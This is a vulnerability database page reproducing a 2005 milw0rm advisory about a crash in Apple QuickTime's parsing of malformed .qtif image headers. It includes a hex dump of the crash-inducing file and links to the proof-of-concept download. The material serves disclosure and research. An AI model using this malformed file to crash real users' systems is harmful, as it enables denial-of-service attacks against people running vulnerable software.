Vulners
Lucene search
Apple QuickTime <= 6.5.2.10 (.qtif) Image Parsing Vulnerability
# Added qtif on milw0rm's sploits archive/ /str0ke #
Application: QuickTime
http://www.apple.com/quicktime/
AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.
The bug:
The problem specifically exists when QuickTime.qts component parsing
(.qtif) image files that contain uncompleted header.
A remote user can create a file that when processed by QuickTime PictureViewer or via browser,
will can cause the remote system to crash.
--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
http://www.exploit-db.com/sploits/vuln.qtif
00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010 ............rUidat......
VENDOR RESPONSE:
No vendor response.
Discoveried By ATmaCA
AtmacaSoft Inc.
http://www.atmacasoft.com
# milw0rm.com [2005-01-24]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1